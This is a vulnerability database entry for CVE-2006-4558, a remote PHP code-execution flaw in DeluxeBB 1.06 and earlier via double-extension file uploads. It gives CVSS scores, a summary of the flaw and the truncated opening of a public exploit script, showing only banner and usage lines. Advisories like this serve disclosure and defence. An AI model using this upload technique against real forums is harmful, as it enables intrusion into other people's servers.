7.5
CVSSv2

CVE-2006-4558

Published: 06/09/2006 Updated: 26/01/2024
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
VMScore: 755
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

DeluxeBB 1.06 and previous versions, when run on the Apache HTTP Server with the mod_mime module, allows remote malicious users to execute arbitrary PHP code by uploading files with double extensions via the fileupload parameter in a newthread action in newpost.php.

Vulnerable Product Search on Vulmon Subscribe to Product

deluxebb deluxebb

Exploits

#!/usr/bin/php -q -d short_open_tag=on <? echo "DeluxeBB <= v106 attachment mod_mime exploit\r\n"; echo "by rgod rgod@autisticiorg\r\n"; echo "site: retrogodaltervistaorg\r\n"; echo "tested & working against a fresh deluxebb installation\r\n\r\n"; if ($argc<4) { echo "Usage: php "$argv[0]" host path cmd OPTIONS\r\n"; echo ...